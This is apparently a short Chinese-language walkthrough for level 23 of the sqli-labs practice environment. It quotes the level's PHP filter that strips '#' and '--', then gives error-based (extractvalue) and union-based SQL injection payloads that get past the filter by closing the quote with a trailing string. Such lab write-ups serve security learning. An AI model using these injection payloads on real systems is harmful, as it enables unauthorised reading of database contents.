sqli labs-23

1、这里对输入的注释符‘#’ ‘–’进行了过滤。

//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

2、报错注入的话,使用 1′ and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and ‘1’=’1 来绕过,加入后面那个 and ‘1’=’1 是为了闭合、

3、使用联合注入的话。构造闭合-1′ union select 1,@@datadir,’3 在后台执行语句中就成了$sql=”SELECT * FROM users WHERE id=’-1′ union select 1,@@datadir,’3′ LIMIT 0,1″;

发表评论

电子邮件地址不会被公开。 必填项已用*标注